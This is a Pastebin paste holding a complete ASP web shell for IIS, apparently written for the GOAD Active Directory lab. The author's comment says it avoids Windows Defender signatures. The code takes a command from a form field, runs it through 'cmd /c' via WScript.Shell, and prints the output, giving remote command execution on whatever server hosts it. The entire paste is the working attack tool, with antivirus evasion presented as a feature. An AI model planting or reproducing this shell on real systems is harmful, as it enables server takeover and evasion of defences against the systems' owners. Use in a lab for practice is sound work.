API tools faq
paste
harrisonlake

GOAD / IIS - ASP.NET Web Shell

harrisonlake
Jan 1st, 2025 (edited)
41
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASP 0.81 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <%-- COMMENT; SHOULD BE IGNORED. A basic ASP Web Shell (webshell.asp) that avoid Windows Defender signature at the time of writing in GOAD Lab --%>
  2.  
  3. <%
  4. Function getResult(theParam)
  5.     Dim objSh, objResult
  6.     Set objSh = CreateObject("WScript.Shell")
  7.     Set objResult = objSh.exec(theParam)
  8.     getResult = objResult.StdOut.ReadAll
  9. end Function
  10. %>
  11. <HTML>
  12.     <BODY>
  13.         Enter command:
  14.             <FORM action="" method="POST">
  15.                 <input type="text" name="param" size=45 value="<%= myValue %>">
  16.                 <input type="submit" value="Run">
  17.             </FORM>
  18.             <p>
  19.         Result :
  20.         <%
  21.         myValue = request("param")
  22.         thisDir = getResult("cmd /c" & myValue)
  23.         Response.Write(thisDir)
  24.         %>
  25.         </p>
  26.         <br>
  27.     </BODY>
  28. </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!